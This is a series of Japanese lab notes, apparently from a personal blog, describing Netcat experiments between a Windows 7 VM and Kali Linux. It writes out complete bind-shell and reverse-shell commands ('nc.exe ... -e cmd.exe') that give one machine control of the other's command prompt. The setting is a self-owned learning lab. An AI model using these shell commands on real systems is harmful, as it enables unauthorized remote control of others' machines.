Netcat 接続実験 その2

Netcat 接続実験 その2

Wndows7 と KaliLinux でリバースシェルの実験

KaliLinux で
ctrl + Alt +t で端末を起動

nc -lvp 5555


Netcat を待受状態で起動

また、別の端末を起動し

ifconfig

でIPアドレスを調べておく
inet と書かれている部分がIPアドレス

次に Windows7 で Command Prompt を起動し

cd C:Work
nc.exe 192.168.1.134 5555 -e cmd.exe

で nc で KaliLinux へ接続

すると KaliLinux 側の端末に Windows 7 のCommand Prompt が
表示される

これで

ipconfig

を実行すると Windows 7 のIPアドレスが表示される

なお、Windows7 側のCommand Prompt なので
他のコマンドなども使うことができる

接続終了するには
KaliLinux 側で exit を実行すればOK

Netcat 接続実験

Netcat 接続実験

Windows 7 試用版で
Command Prompt を開き

cd C:Work
nc.exe -lvp 5555

で netcat を起動

これに kaliLinux で接続できるか実験

本来はホストオンリーアダプタなどで実験するけど
設定がうまくできなかったので
ブリッジ接続で実験

IPは変動するので
Windows 側は

ipconfig 

でIPアドレスを把握

IPv4 Address の部分がIPアドレスになる
今回は
192.168.1.174

次に VirtualBox で KaliLinux を起動

ctrl + Alt + t で端末を起動し

nc 192.168.1.174 5555

で接続

すると
Windows 7 側で

netstat -an

を実行すると
5555ポートが ESTABLISHED になっていればOK

この状態で KaliLinux で hello と入力すると
Windows 側でも hello と表示される

また Windows 側で入力した
windows というメッセージも KaliLinux 側で表示される

なお Netcat を終了するには
ctrl + c でどちらかが接続を停止すると終了する

これを利用すれば
KaliLinux 側から
Windows の Command Prompt を操作することが可能

この実験をするために
Windows で Netcat をサーバとして起動させる
これには
-e オプションを使う

-e オプションで実行するプログラムを指定する

nc.exe -lvp 5555 -e cmd.exe

今回は Windows のシェルの cmd.exe を実行

これで KaliLinux で

nc 192.168.1.174 5555

で接続すると
Windows の Command Prompt が操作できるようになる

試しに Windows のファイル一覧を表示する dir コマンドを実行

すると現在のディレクトリの
Windowsのファイル一覧を表示することができる

なお終了するときには
KaliLinux 側で

exit 

を実行すればOK

なお、windows 側では
前回と異なり操作している状態が表示されない

この手法がバインドシェル
ただし、これだとファイアーウォールやルーターの影響を受ける

理由は外部から内部へのアクセスを制限しているため

Windows セキュリティの実験環境構築 その2

Windows セキュリティの実験環境構築 その2

仮想マシンでセキュリティの実験をするための構築

今回は Netcat
Windows7 試用版で使うために
Netcat for Windows をダウンロード

https://joncraton.org/blog/46/netcat-for-windows/
よりダウンロード可能

Download nc111nt.zip (password:nc) – Netcat for Windows
をクリックしてダウンロード

ダウンロードしたファイルを右クリック >
Extract All …

展開先を聞かれるので
今回は新規に作業ディレクトリを作ってから行うので
Make New Folder をクリック

これで Work というディレクトリを作成しOKをクリック

Extract をクリックするとここへ展開される

展開するときにパスワードを聞かれるので
nc を入力しOKをクリック

これで展開できるので
次に Command Prompt を起動し

cd C:Work

で展開先に cd コマンドで移動

nc.exe -h

を実行するとヘルプが表示される

次にポート5555で待ち受けるサーバーにする

nc.exe -lvp 5555

を実行

オプションに関しては
使いたいときに必ず忘れる便利なコマンド「nc」
https://ltside.com/kizyo/nc.html
を参考に

今回使用したオプションは
l 待受モード
v 情報を表示
p ポートを指定

というもの

実行すると
Windows Firewall が起動するので

Ptivate networks,such as my home or work network

Publick network such as those in airports and coffee shops( not recommended because these networks othen have little or no security)
にチェックを入れ
Allow access
をクリック

状態確認をしたいので
もうひとつ Command Prompt を開き

netstat -an

を実行

これで
5555ポートがLISTEN になっていればOK

なお、
Proto がプロトコル
Local Address がIPアドレス:ポート番号
Foreign Address が接続先のアドレス
State が状態

State が LISTEN なら待受状態になっている